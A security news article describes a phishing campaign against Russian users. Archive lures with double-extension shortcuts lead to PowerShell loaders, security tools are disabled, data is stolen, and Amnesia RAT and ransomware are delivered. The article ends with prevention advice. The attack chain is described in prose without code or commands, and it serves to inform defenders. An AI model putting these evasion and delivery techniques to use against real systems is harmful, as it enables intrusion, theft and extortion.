Cybersecurity experts uncovered a clever multi-stage phishing campaign. It targets people in Russia. Attackers deliver ransomware and a dangerous remote access tool called Amnesia RAT.
How the Attack Begins
Attackers send phishing emails with business documents. These look like normal routine files. For example, they pretend to be work tasks or reports. Therefore, victims open them without much doubt.
The files come inside compressed archives. They include many fake documents in Russian. Additionally, a shortcut file hides inside with a double extension. This tricks users into thinking it is just a text file.
First Stage Loader Activates
When the victim clicks the shortcut, it runs a PowerShell command. This command pulls the next script from a public code-sharing site. However, the script hides its window right away. It creates a fake text file to distract the user.
Next, the script opens that fake document automatically. Meanwhile, it sends a secret message to the attacker. For instance, it uses a messaging bot to confirm success. Then, it waits several minutes before moving forward.
Second Stage Takes Control
After the delay, the script runs an obfuscated script. This script builds the next payload in memory only. Therefore, it leaves no obvious traces on the disk. It also checks for admin rights.
If rights are missing, it shows repeated permission prompts. The victim often clicks yes to stop the annoyance. Consequently, the malware gains higher access. This step opens the door for more harm.
Disabling Defenses Step by Step
Attackers add exclusions to security software. They block scans in key folders like downloads and desktop. Moreover, they turn off extra protection features. Then, they use a trick tool to register a fake antivirus.
This fake entry makes real security software shut down. For example, it pretends another program already protects the system. Therefore, the main defense becomes silent. Attackers also disable useful admin tools through registry changes.
Spying and Gathering Data
The malware downloads a special module for spying. It takes screenshots every 30 seconds. Additionally, it saves them as images and sends them away. It uses a messaging bot for quick delivery.
Later, it steals data from browsers, crypto wallets, chat apps, and games. It grabs webcam photos, audio clips, clipboard text, and window titles. Consequently, attackers gain deep insight into the victim.
Delivering the Main Payloads
One payload brings Amnesia RAT from a file-sharing site. This tool allows full remote control. For instance, attackers run commands, kill processes, and install more malware. They send stolen data through secure channels or file hosts.
Another payload launches ransomware from a known family. It encrypts important files like documents, photos, and code. However, it first stops any interfering programs. It also swaps crypto wallet addresses in the clipboard.
Final Lock and Broader Trends
At the end, a screen-locking tool blocks normal use. Victims see messages to contact the attacker. Meanwhile, other campaigns hit Russian companies too. Some use fake bonus documents or AI-made lures.
For example, attackers deliver hidden implants that load control frameworks. Others use special add-in files for backdoors. These attacks show a rising focus on Russia.
Prevention Strategies
Organizations and users can reduce these risks with simple but strong steps. First, enable tamper protection on security software to block unauthorized changes. Always scan suspicious archives and avoid unknown shortcuts.
Moreover, continuous monitoring spots unusual script activity early. It detects new exclusions or disabled tools right away. Regular employee training helps people recognize fake business lures too. These actions limit damage from multi-stage phishing and stop ransomware before it spreads.
Sleep well, we got you covered.
